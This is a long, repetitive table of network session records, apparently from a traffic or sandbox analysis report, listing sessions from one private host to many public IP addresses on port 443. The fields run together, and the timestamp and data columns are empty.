                                      13662192.168.2.1437966139.212.70.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13663192.168.2.1443612155.155.170.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13664192.168.2.1440692168.184.214.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13665192.168.2.143427882.222.194.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13666192.168.2.1456332101.39.141.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13667192.168.2.1457124119.148.70.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13668192.168.2.1446860161.145.30.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13669192.168.2.14347608.8.24.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13670192.168.2.1453678123.249.26.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13671192.168.2.1448520122.13.185.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13672192.168.2.1434042219.74.214.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13673192.168.2.1444540158.237.103.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13674192.168.2.1455880112.137.173.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13675192.168.2.1440874171.47.125.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13676192.168.2.145415693.68.67.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13677192.168.2.143306293.150.130.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13678192.168.2.1455840138.240.123.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13679192.168.2.1437712216.133.119.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13680192.168.2.144646874.216.169.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13681192.168.2.145177877.167.254.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13682192.168.2.145884658.234.238.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13683192.168.2.144367645.77.144.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13684192.168.2.1437826189.131.199.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13685192.168.2.1441402120.21.174.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13686192.168.2.1446728168.53.64.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13687192.168.2.145874461.31.38.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13688192.168.2.1452692182.221.118.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13689192.168.2.144625237.178.76.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13690192.168.2.1457420117.147.211.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13691192.168.2.1436960176.56.190.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13692192.168.2.1455920155.241.16.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13693192.168.2.1437036203.144.160.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13694192.168.2.1440296179.18.81.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13695192.168.2.143715031.159.73.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13696192.168.2.1444284101.163.120.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13697192.168.2.1435282163.47.75.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13698192.168.2.1445316148.121.96.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13699192.168.2.145174461.149.145.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13700192.168.2.1455642111.146.254.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13701192.168.2.143900875.36.128.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13702192.168.2.1444318122.111.171.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13703192.168.2.144501859.152.149.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13704192.168.2.146004668.216.191.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13705192.168.2.1438672192.97.20.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13706192.168.2.143960084.235.73.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13707192.168.2.144431471.204.7.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13708192.168.2.143442482.118.175.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13709192.168.2.143508043.123.72.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13710192.168.2.145922449.49.73.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13711192.168.2.1434394181.108.169.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13712192.168.2.1455908213.54.25.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13713192.168.2.144551890.159.199.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13714192.168.2.1439562130.201.73.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13715192.168.2.1456988176.232.137.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13716192.168.2.144805094.89.164.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13717192.168.2.144232479.163.196.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13718192.168.2.143602470.220.76.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13719192.168.2.144632037.44.110.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13720192.168.2.1443690183.165.159.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13721192.168.2.1446744212.170.220.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13722192.168.2.1441894111.43.196.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13723192.168.2.1432876107.97.31.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13724192.168.2.145655489.185.164.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13725192.168.2.1457816151.113.78.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13726192.168.2.1448772185.40.13.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13727192.168.2.144805212.149.41.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13728192.168.2.143975892.214.58.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13729192.168.2.143712493.233.82.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13730192.168.2.1435202155.90.46.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13731192.168.2.144138477.83.125.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13732192.168.2.1445972218.34.214.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13733192.168.2.1454122203.137.194.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13734192.168.2.144002817.228.192.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13735192.168.2.1457052192.115.7.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13736192.168.2.14422888.243.243.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13737192.168.2.1460862216.250.199.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13738192.168.2.144905270.55.85.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13739192.168.2.1438586174.205.66.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13740192.168.2.1436564135.39.70.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13741192.168.2.146062059.18.108.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13742192.168.2.143791887.169.133.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13743192.168.2.1454412122.106.95.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13744192.168.2.1459412113.159.49.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13745192.168.2.143841242.64.228.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13746192.168.2.1452844202.51.111.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13747192.168.2.1458200102.254.227.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13748192.168.2.1435562207.229.122.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13749192.168.2.1455704155.193.42.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13750192.168.2.1447506191.179.124.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13751192.168.2.1448942194.15.129.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13752192.168.2.1459948162.233.116.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13753192.168.2.145237685.102.134.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13754192.168.2.1447410191.163.150.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13755192.168.2.1454334212.51.17.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13756192.168.2.144425068.12.15.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13757192.168.2.144419293.61.62.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13758192.168.2.1452168125.211.104.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13759192.168.2.144467084.200.242.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13760192.168.2.1456930205.126.80.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13761192.168.2.1435676218.165.93.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13762192.168.2.1455274128.33.230.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13763192.168.2.1446972138.118.114.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13764192.168.2.145602232.199.200.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13765192.168.2.1440584123.96.59.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13766192.168.2.143752066.178.159.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13767192.168.2.1454526132.211.230.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13768192.168.2.1450550219.82.10.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13769192.168.2.1447378100.182.229.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13770192.168.2.145529482.238.24.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13771192.168.2.143595654.73.97.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13772192.168.2.145056614.80.72.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13773192.168.2.144884269.35.137.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13774192.168.2.144014238.128.245.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13775192.168.2.1457904123.199.214.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13776192.168.2.1445978154.255.148.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13777192.168.2.145690858.135.12.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13778192.168.2.1432934123.193.164.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13779192.168.2.1459336173.176.148.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13780192.168.2.1443804158.155.1.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13781192.168.2.1448810121.38.192.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13782192.168.2.143730648.67.99.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13783192.168.2.144971648.220.94.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13784192.168.2.1455022157.218.214.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13785192.168.2.1455136136.61.228.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13786192.168.2.145591288.26.0.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13787192.168.2.1445312121.4.28.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13788192.168.2.14382564.223.8.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13789192.168.2.1456194167.85.20.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13790192.168.2.1452680151.210.149.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13791192.168.2.1448178220.143.146.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13792192.168.2.1444396169.251.230.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13793192.168.2.144338465.124.172.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13794192.168.2.145278878.126.198.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13795192.168.2.1449632210.201.150.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13796192.168.2.144819268.196.29.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13797192.168.2.1448750106.50.81.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13798192.168.2.1447212104.15.79.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13799192.168.2.1440858174.237.87.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13800192.168.2.144521225.158.100.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13801192.168.2.1448552172.115.246.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13802192.168.2.1439736171.252.124.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13803192.168.2.144045458.10.217.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13804192.168.2.1456930107.155.215.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13805192.168.2.1458296133.91.190.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13806192.168.2.145265839.83.216.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13807192.168.2.1433776148.160.245.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13808192.168.2.1458776166.41.119.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13809192.168.2.145752882.219.191.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13810192.168.2.145823873.76.188.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13811192.168.2.143985472.82.233.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13812192.168.2.1447184191.193.102.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13813192.168.2.145136676.171.47.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13814192.168.2.14402728.66.103.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13815192.168.2.143565839.31.90.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13816192.168.2.1456064204.37.172.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13817192.168.2.1436024190.83.109.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13818192.168.2.1450932123.166.195.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13819192.168.2.143595886.198.224.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13820192.168.2.1442602128.172.14.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13821192.168.2.1457824170.237.247.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13822192.168.2.145357292.47.225.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13823192.168.2.144999480.234.104.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13824192.168.2.1438218119.237.154.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13825192.168.2.1440994124.155.39.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13826192.168.2.1451104133.160.158.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13827192.168.2.143774054.251.7.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13828192.168.2.145239024.170.24.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13829192.168.2.1438234142.150.52.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13830192.168.2.1454872140.113.15.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13831192.168.2.145990482.190.119.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13832192.168.2.1459964164.103.201.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13833192.168.2.143853035.91.84.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13834192.168.2.145212835.227.188.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13835192.168.2.1454182193.177.199.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13836192.168.2.1448304218.43.166.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13837192.168.2.144659647.83.168.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13838192.168.2.1445764112.89.195.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13839192.168.2.1451004182.14.98.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13840192.168.2.1436440180.221.133.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13841192.168.2.1451364221.136.56.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13842192.168.2.145318466.69.132.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13843192.168.2.1439032149.82.19.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13844192.168.2.1453498146.225.101.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13845192.168.2.145129661.182.141.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13846192.168.2.144705269.135.83.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13847192.168.2.1455112194.186.133.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13848192.168.2.144468685.253.66.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13849192.168.2.1458126168.226.37.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13850192.168.2.1442402179.244.136.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13851192.168.2.143681671.74.78.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13852192.168.2.144855427.133.75.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13853192.168.2.143597688.193.23.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13854192.168.2.1460604163.93.169.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13855192.168.2.1458948114.56.45.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13856192.168.2.1451790202.120.78.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13857192.168.2.1446824145.132.154.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13858192.168.2.1454580111.186.156.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13859192.168.2.1443666109.190.99.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13860192.168.2.146020623.184.116.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13861192.168.2.145596072.81.62.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13862192.168.2.1458354135.131.195.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13863192.168.2.1440620123.86.228.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13864192.168.2.1435560198.46.86.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13865192.168.2.144676612.3.168.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13866192.168.2.146052453.123.59.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13867192.168.2.1433656141.110.103.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13868192.168.2.145992678.193.12.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13869192.168.2.144519867.77.174.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13870192.168.2.144021097.98.59.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13871192.168.2.1447526151.90.93.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13872192.168.2.143794441.61.173.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13873192.168.2.1453996153.149.169.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13874192.168.2.1452906188.177.70.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13875192.168.2.1433272160.94.106.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13876192.168.2.1455422179.208.249.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13877192.168.2.1450274132.175.115.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13878192.168.2.1460760150.211.135.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13879192.168.2.1460234150.143.33.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13880192.168.2.1435048144.51.32.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13881192.168.2.1433080185.239.231.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13882192.168.2.145375282.225.250.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13883192.168.2.1433388114.131.16.191443
                                      TimestampBytes transferredDirectionData


